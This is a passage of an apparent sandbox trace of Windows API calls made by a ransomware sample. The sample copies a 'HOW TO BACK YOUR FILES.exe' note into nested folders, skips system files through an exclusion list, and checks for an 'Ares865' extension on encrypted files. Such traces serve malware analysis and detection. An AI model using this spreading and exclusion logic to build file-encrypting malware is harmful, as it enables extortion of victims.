Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate" [0091.547] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.547] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\replicate\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.547] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.547] GetLastError () returned 0x0 [0091.548] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.548] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.548] CloseHandle (hObject=0x120) returned 1 [0091.548] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.548] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.548] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cfe13c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.548] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.548] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.548] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0091.548] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cfe13c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.548] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.548] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0091.548] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0091.548] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0091.548] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4cfe13c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0091.548] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0091.548] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x680f5660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x680f5660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Security", cAlternateFileName="")) returned 1 [0091.548] lstrcmpiW (lpString1="Security", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0091.548] lstrcmpiW (lpString1="Security", lpString2="aoldtz.exe") returned 1 [0091.548] lstrcmpiW (lpString1="Security", lpString2=".") returned 1 [0091.548] lstrcmpiW (lpString1="Security", lpString2="..") returned 1 [0091.548] lstrcmpiW (lpString1="Security", lpString2="windows") returned -1 [0091.548] lstrcmpiW (lpString1="Security", lpString2="bootmgr") returned 1 [0091.548] lstrcmpiW (lpString1="Security", lpString2="temp") returned -1 [0091.548] lstrcmpiW (lpString1="Security", lpString2="pagefile.sys") returned 1 [0091.548] lstrcmpiW (lpString1="Security", lpString2="boot") returned 1 [0091.548] lstrcmpiW (lpString1="Security", lpString2="ids.txt") returned 1 [0091.549] lstrcmpiW (lpString1="Security", lpString2="ntuser.dat") returned 1 [0091.549] lstrcmpiW (lpString1="Security", lpString2="perflogs") returned 1 [0091.549] lstrcmpiW (lpString1="Security", lpString2="MSBuild") returned 1 [0091.549] lstrlenW (lpString="Security") returned 8 [0091.549] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\*") returned 202 [0091.549] lstrcpyW (in: lpString1=0x2cce592, lpString2="Security" | out: lpString1="Security") returned="Security" [0091.549] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b68 [0091.549] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1a4) returned 0x32cfc8 [0091.549] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b70 | out: ListHead=0x2e7710, ListEntry=0x2e7b70) returned 0x2e7b50 [0091.549] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x680f5660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x680f5660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Security", cAlternateFileName="")) returned 0 [0091.549] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0091.549] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b70 [0091.549] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security" [0091.549] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32cfc8 | out: hHeap=0x2b0000) returned 1 [0091.549] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0091.549] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security") returned 209 [0091.549] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security" [0091.549] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.549] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\replicate\\security\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.550] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.550] GetLastError () returned 0x0 [0091.550] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.550] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.550] CloseHandle (hObject=0x120) returned 1 [0091.550] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.550] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.550] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x680f5660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x680f5660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.550] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.550] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.550] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0091.550] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x680f5660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x680f5660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.551] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.551] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0091.551] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0091.551] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0091.551] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x680f5660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x4e0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="directories.acrodata.Ares865", cAlternateFileName="DIRECT~1.ARE")) returned 1 [0091.551] lstrcmpiW (lpString1="directories.acrodata.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.551] lstrcmpiW (lpString1="directories.acrodata.Ares865", lpString2="aoldtz.exe") returned 1 [0091.551] lstrcmpiW (lpString1="directories.acrodata.Ares865", lpString2=".") returned 1 [0091.551] lstrcmpiW (lpString1="directories.acrodata.Ares865", lpString2="..") returned 1 [0091.551] lstrcmpiW (lpString1="directories.acrodata.Ares865", lpString2="windows") returned -1 [0091.551] lstrcmpiW (lpString1="directories.acrodata.Ares865", lpString2="bootmgr") returned 1 [0091.551] lstrcmpiW (lpString1="directories.acrodata.Ares865", lpString2="temp") returned -1 [0091.551] lstrcmpiW (lpString1="directories.acrodata.Ares865", lpString2="pagefile.sys") returned -1 [0091.551] lstrcmpiW (lpString1="directories.acrodata.Ares865", lpString2="boot") returned 1 [0091.551] lstrcmpiW (lpString1="directories.acrodata.Ares865", lpString2="ids.txt") returned -1 [0091.551] lstrcmpiW (lpString1="directories.acrodata.Ares865", lpString2="ntuser.dat") returned -1 [0091.551] lstrcmpiW (lpString1="directories.acrodata.Ares865", lpString2="perflogs") returned -1 [0091.551] lstrcmpiW (lpString1="directories.acrodata.Ares865", lpString2="MSBuild") returned -1 [0091.551] lstrlenW (lpString="directories.acrodata.Ares865") returned 28 [0091.551] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*") returned 211 [0091.551] lstrcpyW (in: lpString1=0x2cce5a4, lpString2="directories.acrodata.Ares865" | out: lpString1="directories.acrodata.Ares865") returned="directories.acrodata.Ares865" [0091.551] lstrlenW (lpString="directories.acrodata.Ares865") returned 28 [0091.551] lstrlenW (lpString="Ares865") returned 7 [0091.551] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0091.551] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4d007520, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4d007520, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0091.551] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0091.551] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4d007520, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4d007520, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0091.551] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0091.551] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b50 [0091.551] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe" [0091.551] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0091.551] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b48 | out: hHeap=0x2b0000) returned 1 [0091.551] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe") returned 160 [0091.551] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe" [0091.551] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.552] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.552] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.552] GetLastError () returned 0x0 [0091.552] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.552] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.552] CloseHandle (hObject=0x120) returned 1 [0091.552] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.552] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.553] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cf6efa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cf6efa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.553] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.553] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.553] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0091.553] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cf6efa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cf6efa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.553] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.553] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0091.553] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0091.553] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0091.553] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cfe13c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Acrobat", cAlternateFileName="")) returned 1 [0091.553] lstrcmpiW (lpString1="Acrobat", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.553] lstrcmpiW (lpString1="Acrobat", lpString2="aoldtz.exe") returned -1 [0091.553] lstrcmpiW (lpString1="Acrobat", lpString2=".") returned 1 [0091.553] lstrcmpiW (lpString1="Acrobat", lpString2="..") returned 1 [0091.553] lstrcmpiW (lpString1="Acrobat", lpString2="windows") returned -1 [0091.553] lstrcmpiW (lpString1="Acrobat", lpString2="bootmgr") returned -1 [0091.553] lstrcmpiW (lpString1="Acrobat", lpString2="temp") returned -1 [0091.553] lstrcmpiW (lpString1="Acrobat", lpString2="pagefile.sys") returned -1 [0091.553] lstrcmpiW (lpString1="Acrobat", lpString2="boot") returned -1 [0091.553] lstrcmpiW (lpString1="Acrobat", lpString2="ids.txt") returned -1 [0091.553] lstrcmpiW (lpString1="Acrobat", lpString2="ntuser.dat") returned -1 [0091.553] lstrcmpiW (lpString1="Acrobat", lpString2="perflogs") returned -1 [0091.553] lstrcmpiW (lpString1="Acrobat", lpString2="MSBuild") returned -1 [0091.553] lstrlenW (lpString="Acrobat") returned 7 [0091.553] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\*") returned 162 [0091.553] lstrcpyW (in: lpString1=0x2cce542, lpString2="Acrobat" | out: lpString1="Acrobat") returned="Acrobat" [0091.553] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b48 [0091.553] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x152) returned 0x31efc8 [0091.553] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b50 | out: ListHead=0x2e7710, ListEntry=0x2e7b50) returned 0x2e7b10 [0091.553] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cf6efa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cf6efa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ARM", cAlternateFileName="")) returned 1 [0091.554] lstrcmpiW (lpString1="ARM", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.554] lstrcmpiW (lpString1="ARM", lpString2="aoldtz.exe") returned 1 [0091.554] lstrcmpiW (lpString1="ARM", lpString2=".") returned 1 [0091.554] lstrcmpiW (lpString1="ARM", lpString2="..") returned 1 [0091.554] lstrcmpiW (lpString1="ARM", lpString2="windows") returned -1 [0091.554] lstrcmpiW (lpString1="ARM", lpString2="bootmgr") returned -1 [0091.554] lstrcmpiW (lpString1="ARM", lpString2="temp") returned -1 [0091.554] lstrcmpiW (lpString1="ARM", lpString2="pagefile.sys") returned -1 [0091.554] lstrcmpiW (lpString1="ARM", lpString2="boot") returned -1 [0091.554] lstrcmpiW (lpString1="ARM", lpString2="ids.txt") returned -1 [0091.554] lstrcmpiW (lpString1="ARM", lpString2="ntuser.dat") returned -1 [0091.554] lstrcmpiW (lpString1="ARM", lpString2="perflogs") returned -1 [0091.554] lstrcmpiW (lpString1="ARM", lpString2="MSBuild") returned -1 [0091.554] lstrlenW (lpString="ARM") returned 3 [0091.554] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat") returned 168 [0091.554] lstrcpyW (in: lpString1=0x2cce542, lpString2="ARM" | out: lpString1="ARM") returned="ARM" [0091.554] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b68 [0091.554] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x14a) returned 0x2cdda8 [0091.554] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b70 | out: ListHead=0x2e7710, ListEntry=0x2e7b70) returned 0x2e7b50 [0091.554] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4cf6efa0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4cf6efa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0091.554] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0091.554] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4cf6efa0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4cf6efa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, 